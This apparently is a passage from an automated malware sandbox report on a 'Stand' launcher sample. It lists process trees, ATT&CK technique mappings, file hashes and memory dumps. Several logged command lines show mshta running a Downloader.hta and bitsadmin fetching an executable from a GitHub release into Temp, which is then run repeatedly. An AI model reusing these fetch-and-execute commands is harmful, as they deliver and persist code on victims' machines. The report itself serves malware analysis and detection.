        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        363⤵
        
        PID:7088
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        363⤵
        
        PID:1516
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        364⤵
        
        PID:5280
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        364⤵
        
        PID:3748
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        365⤵
        Download via BitsAdmin
        
        PID:4768
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        365⤵
        
        PID:6844
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        366⤵
        
        PID:6820
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        366⤵
        
        PID:932
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        367⤵
        Download via BitsAdmin
        
        PID:2408
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        367⤵
        
        PID:1296
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        368⤵
        
        PID:1052
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        368⤵
        
        PID:1156
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        369⤵
        Download via BitsAdmin
        
        PID:5904
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        369⤵
        
        PID:992
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        370⤵
        
        PID:4668
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        370⤵
        
        PID:2304
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        371⤵
        
        PID:7104
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        371⤵
        
        PID:5156
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        372⤵
        
        PID:3552
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        372⤵
        
        PID:3836
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        373⤵
        
        PID:2404
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        373⤵
        
        PID:4788

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1539799783-425691395-993110047-416356235-1040824007-1952791730317331832125728269"
1⤵
PID:980

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-78439786-907636771-15821329485570169132038088998-1442673898-186902461204016139"
1⤵
PID:1376

C:\Windows\system32\taskeng.exe
taskeng.exe {E963FDBD-A878-4388-9482-B9F28C717890} S-1-5-21-1658372521-4246568289-2509113762-1000:PIRBKNPS\Admin:Interactive:[1]
1⤵
PID:2576
- C:\Users\Admin\AppData\Local\Temp\Stand.exe
  C:\Users\Admin\AppData\Local\Temp\Stand.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2724
- C:\Users\Admin\AppData\Local\Temp\Stand.exe
  C:\Users\Admin\AppData\Local\Temp\Stand.exe
  2⤵
  PID:2472
- C:\Users\Admin\AppData\Local\Temp\Stand.exe
  C:\Users\Admin\AppData\Local\Temp\Stand.exe
  2⤵
  PID:1252
- C:\Users\Admin\AppData\Local\Temp\Stand.exe
  C:\Users\Admin\AppData\Local\Temp\Stand.exe
  2⤵
  PID:2616
- C:\Users\Admin\AppData\Local\Temp\Stand.exe
  C:\Users\Admin\AppData\Local\Temp\Stand.exe
  2⤵
  PID:6896
- C:\Users\Admin\AppData\Local\Temp\Stand.exe
  C:\Users\Admin\AppData\Local\Temp\Stand.exe
  2⤵
  PID:4980
- C:\Users\Admin\AppData\Local\Temp\Stand.exe
  C:\Users\Admin\AppData\Local\Temp\Stand.exe
  2⤵
  PID:6156
- C:\Users\Admin\AppData\Local\Temp\Stand.exe
  C:\Users\Admin\AppData\Local\Temp\Stand.exe
  2⤵
  PID:6440
- C:\Users\Admin\AppData\Local\Temp\Stand.exe
  C:\Users\Admin\AppData\Local\Temp\Stand.exe
  2⤵
  PID:3572

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2860958560356609-78221259014284199781293199706402265280-2039141592-1375839303"
1⤵
PID:1076

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "4723573261873637266-1899639396-981024186-1119976309-2019084627493507438-823972830"
1⤵
PID:276

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1216020053-1464559344-213418247696015467582099506443575611565708483491470455"
1⤵
PID:1912

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-18554224041613107696-124659310377155526405069040-7793346616163546321531629735"
1⤵
PID:1880

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1228459290671505361512086401-1710046319-2318801681662660435-1709462794335720922"
1⤵
PID:1960

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-19142097091437722564546445848-1131432059-1557293161248115495465880350-1465324366"
1⤵
PID:1872

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "11920768217594612281230212147-4976906611432021523-1750491332-205378290-123991463"
1⤵
PID:1004

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "7239098122048393653-1399514721881137443-1880178863-21054495092057100765-536962357"
1⤵
PID:768

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-148902587718334386425715042-6186678561362970422141455728420863005381737148056"
1⤵
PID:2028

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1275309640-140977574270347480-1148152334-185264567-1564320762-38195483-903323634"
1⤵
PID:1708

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-390445243110382313216182238231797123575-2015825152-2060007580132805433-396571774"
1⤵
PID:2316

C:\Windows\system32\ctfmon.exe
ctfmon.exe
1⤵
PID:2192

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:2256

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3F6B5E16-092A-41ED-930B-0B4125D91D4E}
1⤵
PID:2012

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x620
1⤵
PID:2492

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3F6B5E16-092A-41ED-930B-0B4125D91D4E}
1⤵
PID:3884

C:\Windows\system32\rundll32.exe
rundll32.exe uxtheme.dll,#64 C:\Windows\resources\Themes\Aero\Aero.msstyles?NormalColor?NormalSize
1⤵
PID:5224

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

BITS Jobs

T1197

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

BITS Jobs

T1197

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Downloader.hta

Filesize
902B

MD5
ebd443575858c52e16ec6f0cf6259925

SHA1
497058b1f7f31a015fee8b857b1449d492625fcc

SHA256
d9b644f72c25f9713f24acfcd32ee6ef6ea57d9dcfefce49d6acc848cf768dd6

SHA512
3ae733da0ec4b2b841f3851e1c9a2c361728370681fef7b7e0a5e53f79725a171c8402719b7a87248693f0a61080cf110ff3f34a868aedd85c5a425400eb85ad

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
b09d3f372fa26a3c663facbe1d1b53ce

SHA1
00becfda0ae4a01c813e5c9bc18f524bb7331e2c

SHA256
d0cc87bf457e65b84d8c20a899489a0877615d72f9be19241140aeaaaaf33e70

SHA512
0e1e292a6ae09c570a116f53a15b39990c8259e3c4c8d259b5e221f70ae7b25ae9fa401e901a656c5ae264f17f61a2fde0235d9119d92bb481bc376540024638

Download Submit
C:\Users\Admin\AppData\Roaming\Stand.exe

Filesize
97KB

MD5
30616682898f5d130d7d93f4d78c002d

SHA1
f803aebd10386f6fb5790ed015dabbfd409d8c10

SHA256
86feff5f4e9a433b3a7d95ba65bf370e56655a9b197ab9aef059ae8a606ec2cf

SHA512
40a950e3866b4017acb66c5566eb70f9763d7079ac79c22c5a99a7b02a8833e73f31872c746938325e503050ee03185014efa2e675f6b6900397226c8194a80c

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/476-26-0x0000000000840000-0x0000000000868000-memory.dmp

Filesize
160KB

Download
memory/476-31-0x000007FEF5870000-0x000007FEF625C000-memory.dmp

Filesize
9.9MB

Download
memory/576-50-0x000007FEF5870000-0x000007FEF625C000-memory.dmp

Filesize
9.9MB

Download
memory/576-70-0x000007FEF5870000-0x000007FEF625C000-memory.dmp

Filesize
9.9MB

Download
memory/896-87-0x0000000002710000-0x0000000002790000-memory.dmp

Filesize
512KB

Download
memory/896-83-0x0000000002710000-0x0000000002790000-memory.dmp

Filesize
512KB

Download
memory/896-82-0x00000000023E0000-0x00000000023E8000-memory.dmp

Filesize
32KB

Download
memory/896-81-0x000007FEEEC40000-0x000007FEEF5DD000-memory.dmp

Filesize
9.6MB

Download
memory/896-84-0x000007FEEEC40000-0x000007FEEF5DD000-memory.dmp

Filesize
9.6MB

Download
memory/896-85-0x0000000002710000-0x0000000002790000-memory.dmp

Filesize
512KB

Download
memory/896-80-0x000000001B340000-0x000000001B622000-memory.dmp

Filesize
2.9MB

Download
memory/896-86-0x0000000002710000-0x0000000002790000-memory.dmp

Filesize
512KB

Download
memory/896-89-0x000007FEEEC40000-0x000007FEEF5DD000-memory.dmp

Filesize
9.6MB

Download
memory/1168-60-0x0000000002580000-0x0000000002600000-memory.dmp

Filesize
512KB

Download
memory/1168-66-0x000007FEEE2A0000-0x000007FEEEC3D000-memory.dmp

Filesize
9.6MB

Download
memory/1168-64-0x0000000002580000-0x0000000002600000-memory.dmp

Filesize
512KB

Download
memory/1168-63-0x0000000002580000-0x0000000002600000-memory.dmp

Filesize
512KB

Download
memory/1168-62-0x0000000002580000-0x0000000002600000-memory.dmp

Filesize
512KB

Download
memory/1168-61-0x000007FEEE2A0000-0x000007FEEEC3D000-memory.dmp

Filesize
9.6MB

Download
memory/1168-58-0x000007FEEE2A0000-0x000007FEEEC3D000-memory.dmp

Filesize
9.6MB

Download
memory/1168-59-0x0000000001F30000-0x0000000001F38000-memory.dmp

Filesize
32KB

Download
memory/1168-57-0x000000001B350000-0x000000001B632000-memory.dmp

Filesize
2.9MB

Download
memory/1360-19-0x000007FEF5870000-0x000007FEF625C000-memory.dmp

Filesize
9.9MB

Download
memory/1360-40-0x000007FEF5870000-0x000007FEF625C000-memory.dmp

Filesize
9.9MB

Download
memory/1572-105-0x0000000002300000-0x0000000002380000-memory.dmp

Filesize
512KB

Download
memory/1572-107-0x000007FEEE2A0000-0x000007FEEEC3D000-memory.dmp

Filesize
9.6MB

Download
memory/1572-108-0x0000000002300000-0x0000000002380000-memory.dmp

Filesize
512KB

Download
memory/1572-109-0x0000000002300000-0x0000000002380000-memory.dmp

Filesize
512KB

Download
memory/1572-106-0x0000000002300000-0x0000000002380000-memory.dmp

Filesize
512KB

Download
memory/1572-103-0x000007FEEE2A0000-0x000007FEEEC3D000-memory.dmp

Filesize
9.6MB

Download
memory/1572-111-0x000007FEEE2A0000-0x000007FEEEC3D000-memory.dmp

Filesize
9.6MB

Download
memory/1572-104-0x000000001B240000-0x000000001B522000-memory.dmp

Filesize
2.9MB

Download
memory/1736-21-0x000007FEF5870000-0x000007FEF625C000-memory.dmp

Filesize
9.9MB

Download
memory/1736-15-0x000007FEF5870000-0x000007FEF625C000-memory.dmp

Filesize
9.9MB

Download
memory/1736-14-0x0000000001030000-0x0000000001058000-memory.dmp

Filesize
160KB

Download
memory/1756-42-0x000007FEEEC40000-0x000007FEEF5DD000-memory.dmp

Filesize
9.6MB

Download
memory/1756-37-0x0000000002740000-0x00000000027C0000-memory.dmp

Filesize
512KB

Download
memory/1756-39-0x0000000002740000-0x00000000027C0000-memory.dmp

Filesize
512KB

Download
memory/1756-33-0x0000000002480000-0x0000000002488000-memory.dmp

Filesize
32KB

Download
memory/1756-36-0x000007FEEEC40000-0x000007FEEF5DD000-memory.dmp

Filesize
9.6MB

Download
memory/1756-34-0x000007FEEEC40000-0x000007FEEF5DD000-memory.dmp

Filesize
9.6MB

Download
memory/1756-32-0x000000001B2A0000-0x000000001B582000-memory.dmp

Filesize
2.9MB

Download
memory/1756-35-0x0000000002740000-0x00000000027C0000-memory.dmp

Filesize
512KB

Download
memory/2124-72-0x000007FEF5870000-0x000007FEF625C000-memory.dmp

Filesize
9.9MB

Download
memory/2124-88-0x000007FEF5870000-0x000007FEF625C000-memory.dmp

Filesize
9.9MB

Download
memory/2232-67-0x000007FEF5870000-0x000007FEF625C000-memory.dmp

Filesize
9.9MB

Download
memory/2232-65-0x0000000000190000-0x00000000001B8000-memory.dmp

Filesize
160KB

Download
memory/2232-74-0x000007FEF5870000-0x000007FEF625C000-memory.dmp

Filesize
9.9MB

Download
memory/2256-90-0x000007FEF5870000-0x000007FEF625C000-memory.dmp

Filesize
9.9MB

Download
memory/2256-91-0x00000000010E0000-0x0000000001108000-memory.dmp

Filesize
160KB

Download
memory/2256-110-0x000007FEF5870000-0x000007FEF625C000-memory.dmp

Filesize
9.9MB

Download
memory/2364-11-0x000007FEF5870000-0x000007FEF625C000-memory.dmp

Filesize
9.9MB

Download
memory/2364-1-0x000007FEF5870000-0x000007FEF625C000-memory.dmp

Filesize
9.9MB

Download
memory/2364-0-0x0000000000E30000-0x0000000000E58000-memory.dmp

Filesize
160KB

Download
memory/2420-41-0x000007FEF5870000-0x000007FEF625C000-memory.dmp

Filesize
9.9MB

Download
memory/2420-38-0x000007FEF5870000-0x000007FEF625C000-memory.dmp

Filesize
9.9MB

Download
memory/2592-94-0x000007FEF5870000-0x000007FEF625C000-memory.dmp

Filesize
9.9MB

Download
memory/2936-9-0x0000000001090000-0x00000000010AE000-memory.dmp

Filesize
120KB

Download
memory/2936-48-0x000007FEF5870000-0x000007FEF625C000-memory.dmp

Filesize
9.9MB

Download
memory/2936-10-0x000007FEF5870000-0x000007FEF625C000-memory.dmp

Filesize
9.9MB

Download
memory/2936-13-0x0000000000E30000-0x0000000000EB0000-memory.dmp

Filesize
512KB

Download
memory/3068-44-0x0000000001140000-0x0000000001168000-memory.dmp

Filesize
160KB

Download
memory/3068-43-0x000007FEF5870000-0x000007FEF625C000-memory.dmp

Filesize
9.9MB

Download
memory/3068-51-0x000007FEF5870000-0x000007FEF625C000-memory.dmp

Filesize
9.9MB

Download